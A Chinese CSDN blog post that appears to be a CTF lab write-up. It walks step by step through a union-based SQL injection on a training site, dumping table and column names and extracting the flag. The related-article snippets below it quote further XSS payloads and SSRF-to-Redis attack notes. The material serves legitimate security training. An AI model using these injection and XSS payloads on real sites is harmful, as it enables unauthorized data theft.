从0到1的ctfer成长之路web闯关

最新推荐文章于 2024-07-30 07:20:59 发布
最新推荐文章于 2024-07-30 07:20:59 发布
阅读量195 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52988674/article/details/118196647
版权
本文讲述了作者通过SQL注入技巧逐步揭示网站安全漏洞的过程,从http://eci-2ze9c1cyly5iyeoqfmq8.cloudeci1.ichunqiu.com/index.php?id=1 的异常回显,到利用information_schema进行数据库字段和表查询,最终获取fl4g表的旗标。
摘要由CSDN通过智能技术生成

第一关

第一步输入

http://eci-2ze9c1cyly5iyeoqfmq8.cloudeci1.ichunqiu.com/index.php?id=1‘or 1=1--+

发现回显正常,判断有sql注入漏洞(--+为注释符号,还有其他的,自行了解)

第二步输入

http://eci-2ze9c1cyly5iyeoqfmq8.cloudeci1.ichunqiu.com/index.php?id=1’order by 10--+

无回显,这里用二分法10,5,2发现输入2的时候回显正常,在输入3也正常,但在4的时候无回显,故判断此处数据库有3个字段,因此后面使用联合查找

http://eci-2ze9c1cyly5iyeoqfmq8.cloudeci1.ichunqiu.com/index.php?id=-1‘union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()--+

此处database()返回的是该数据库名,MySQL5.0版本后默认自带了一个information_schema,MySQL上所有数据库名,表名,字段名都可以从中查出,为我们注入提供了便利(当然他的本意我想并非如此)。

fl4g,notes

我们可以看到页面返回了此数据库的所有表,一共两个,显然我们需要的是前者,接下来我们查询fl4g中的字段,同样联合查找

http://eci-2ze9c1cyly5iyeoqfmq8.cloudeci1.ichunqiu.com/index.php?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name="fl4g"--+

回显

fllllag

找到所要字段,最后同样联合查找

http://eci-2ze0y9jcv7gxwyhb5j3e.cloudeci1.ichunqiu.com/index.php?id=-1‘union select 1,2,fllllag from fl4g--+

华丽的获得了第一关的flag

The_All_one
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]XSS闯关
weixin_46703850的博客
02-23 1621
《从0到1:CTFer成长之路》书籍配套题目,来源网站:[《从0到1:CTFer成长之路》](https://book.nu1l.com/)
《从0到1:CTFer成长之路》靶场练习手记
X_python321的博客
03-07 1202
第一章 web入门 环境:主机Win10+VM 12 pro+Ubuntu 20 VM安装包链接 链接:https://pan.baidu.com/s/159zcAsCSctaz_TmrrEribg 提取码:riiq licence可自行百度 Ubuntu 的镜像可以从阿里的开源镜像站下载 阿里巴巴开源镜像站-OPSX镜像站-阿里云开发者社区 注意事项1:VM安装Ubuntu的时候选择配置尽量大一点,笔者第一次安装时选择的配置是1G内存 1核 1处理器(这个是安装时系统默认推荐的配置),可以正
从0到1:CTFer成长之路-PWN篇
最新发布
07-30 229
格式化字符串不在栈上的利用方式, 参数在 .bss 段,不在栈上条件: 需要多次可输入参数。
2024年最新《从0到1:CTFer成长之路》2,2024年最新物联网嵌入式开发岗
2401_85013357的博客
05-14 786
攻击者通过SSRF漏洞未授权访问内网Redis,可能导致任意增、查、删、改其中的内容,甚至利用导出功能写入Crontab、Webshell和SSH公钥(使用导出功能写入的文件所有者为redis的启动用户,一般启动用户为root,如果启动用户权限较低,将无法完成攻击)。Redis是一条指令执行一个行为,如果其中一条指令是错误的,那么会继续读取下一条,所以如果发送的报文中可以控制其中一行,就可以将其修改为Redis指令,分批执行指令,完成攻击。首先,FastCGI本质上是一个协议,在CGI的基础上进行了优化。
《从0到1:CTFer成长之路》2.1 SSRF漏洞
ZhShy
01-15 4941
文章目录2.1.1 SSRF的原理解析2.1.2 SSRF漏洞的寻找和测试2.1.3 SSRF漏洞攻击方式2.1.3.1 内部服务资产探测2.1.3.2 使用Gopher协议扩展攻击面1. 攻击Redis2. 攻击MySQL3. PHP-FPM攻击4. 攻击内网中的脆弱web应用 SSRF(Server Side Request Forgery,服务端请求伪造)是一种攻击者通过构造数据进而伪造服务器端发起请求的漏洞。因为请求是由内部发起的,所以一般情况下,SSRF漏洞攻击的目标往往是从外网无法访问的内部系
i春秋《从0到1:CTFer成长之路》题目(Web——SQL注入-2)
LSYZWF的博客
05-21 2054
文章目录题目链接:解题思路1、首先点击login.php,输入进行尝试2、开始尝试是否存在注入3、这里可以判断列字段的个数,但是没有回显此步可以省略4、由于没有回显,故只能尝试盲注5、抓包分析6、编写脚本 题目链接: https://www.ichunqiu.com/battalion?t=1&r=68487 解题思路 1、首先点击login.php,输入进行尝试 输入admin显示账户或者密码错误 而输入其他显示账号不存在 这里可以初步猜测用户名就是admin 2、开始尝试是否存在注入 输入a
从0到1的CTF之旅————Web(1)
qq_44373268的博客
06-15 876
今天学习了一下web感觉受益匪浅,小做几道题练练手,纯新手勿喷 ————————————————————————————————————————————第一题:[极客大挑战 2019]EasySQL 首先思考的便是最简单的登录绕过。在逻辑上面,当点击登录按钮后会取你输入框的值与数据库中进行对比。 登录绕过是最基础的,就是要将这句SQL语句给屏蔽掉,进而让此语句的执行结果始终为真。输入下面万能密码 当执行此语句时 ,就会变成` 此时的 1=1 恒为真,在 或 状态下有一个为真则始终为真,此时可绕过登录。得到f
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]文件上传
weixin_46703850的博客
02-24 3118
[第二章 web进阶]文件上传开始行动绕过第1个限制绕过第2个限制 介绍:记录一下笔记,方便以后迅速回忆使用。 《从0到1:CTFer成长之路》书籍配套题目,来源网站:《从0到1:CTFer成长之路》 先看一下题目源码: <?php header("Content-Type:text/html; charset=utf-8"); // 每5分钟会清除一次目录下上传的文件 require_once('pclzip.lib.php'); if(!$_FILES){ echo '
《从0到1:CTFer成长之路》SQL注入-1
tr_trTTT的博客
04-07 4170
前言: 我是新手小白,创建此文章只为了记录自己的学习 题目: 我们先进入环境 题目已经明确告诉我们是SQL注入了,我们直接就看一下哪里会存在注入点。 网址存在id=1,可能存在注入点,手工一下看看是否存在。 先用 ' 试一下,返回了一个错误页面,说明存在sql注入,再用and 1=1 试一下,返回正确的页面,那我们再次试一下and 1=2,返回的是错误的页面; ...
《从0到1:CTFer成长之路》粗心的小李
tr_trTTT的博客
04-02 2923
前言: 我是CTF小白,创建此文章只为了记录自己学习的进度 题目: 我们先进入环境 这边给了提示,是吧git放到了外网环境,直接扫一下目录吧,查找一下git目录 git目录下是有东西的 所以我们可以利用工具GitHack或者Git_Extract-master把泄露的内容下载下来 下载下来的文件就会在这边 直接打开就可以看到flag n1book{git_looks_s0_easyfun} ...
html5简单的闯关小游戏源码下载
11-03
html5简单的闯关小游戏源码下载 html5简单的闯关小游戏源码下载
CTF从0-1,web1-1,wp
weixin_45486362的博客
06-15 287
本地成功搭建环境后,访问http://127.0.0.1/得到页面 直接利用dirsearch扫描 python3 dirsearch -u http://127.0.0.1/ -e* 访问http://127.0.0.1/robots.txt 发现目录/flag1_is_her3_fun.txt得到第一段flag 访问http://127.0.0.1/index.php~得到第二段flag 访问http://127.0.0.1/index.php.swp得到第三段flag FLAG:n1book{
[CTF萌新的Bugku web闯关之路] web 2过关!
HippoLaoBan的博客
05-02 305
Web 2 Bugku链接 跟随所给的链接进入web2,马上就被无数的/滑稽支配了 此时我们右键鼠标 可以发现是没有查看源代码的选项的,整个页面都被图片覆盖 这时候我们按下了F12 可以看到 我们的需要的flag就光明正大地出现在了我们面前 另外,当我们对着满屏的滑稽傻笑一段时间后,他们也是会消失的,这时候也就可以右键查看页面源代码得到flag 或者我们将浏览器窗口缩小,刷新页面,再全屏 就可以通...
[CTF萌新的Bugku web闯关之路] web基础$_GET 过关!
HippoLaoBan的博客
05-02 317
web基础$_GET Bugku链接 看标题就可以知道这一关考察的是GET请求 到地方后可以看见,页面的源代码已经显示在屏幕上了 简单翻译这串代码 $_GET[‘what’] 获取get请求中what的值 将这个值赋给 $what 在网页上打印 $what的值 如果 $what的值是flag 在网页上打印我们需要的flag 所以我们要做的就是发送一个what=flag的get请求 在地址栏最...
[第二章 web进阶]XSS闯关
Forever_Han13的博客
02-20 569
Less-1: <script>alert('xss')</script> Less-2: ';alert(1);' Less-3: '';alert(1);// Less-4: jumpUrl=javascript:alert('xss') Less-5: ?autosubmit=1&action=javascript:alert(1) Less-6: {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} }
《从0到1:CTFer成长之路》书籍配套题目[第一章 web入门]SQL注入
wuyaowangchuan的博客
11-19 2031
这道题没有过滤,超级简单 文章目录手注sqlmap跑 进入环境 手注 b0658771-a130-4835-bb40-f6cca649bccf.node3.buuoj.cn/index.php?id=1' http://b0658771-a130-4835-bb40-f6cca649bccf.node3.buuoj.cn/index.php?id=1%27%20and%201=1%20%23 id=1%27%20and%201=2%20%23 说明是字符型注入 然后开始注入 ?id=1%27.
一道经典CTF题目——“1和0的故事”
m0_62588487的博客
10-12 1235
无聊写一个夺旗题
2022-ISCC信息安全与对抗竞赛wp-misc(详解,有脚本( •̀ ω •́ )y)
路baby的博客
04-17 4199
没想到不知不觉一年时间就这样过去了,又到了一年一度的ISCC信息对抗大赛,不知道去年打比赛的小伙伴今年还能不能再碰到,期待与君再相见( •̀ ω •́ )y所以今天就把去年的题目再复现一遍供师傅们参考 嘻嘻目录前言misc(1)2022冬奥会(2)单板小将苏翊鸣(3)隐秘的信息(4)降维打击(5)藏在星空中的诗-1(6)藏在星空中的诗-2(7)真相只有一个(8)小光学AI(9)套中套flag2flag1flag3加油各位( •̀ ω •́ )y 期待与君再相逢。
从0到1:CTFer成长之路 sql注入1
07-27
CTFer成长之路中,SQL注入是一个重要的技术点。SQL注入是一种利用用户输入数据不当,从而欺骗数据库执行恶意操作的攻击方式。在CTF比赛中,了解和掌握SQL注入技术可以帮助你解决一些与数据库相关的题目。 首先,你...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

The_All_one

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值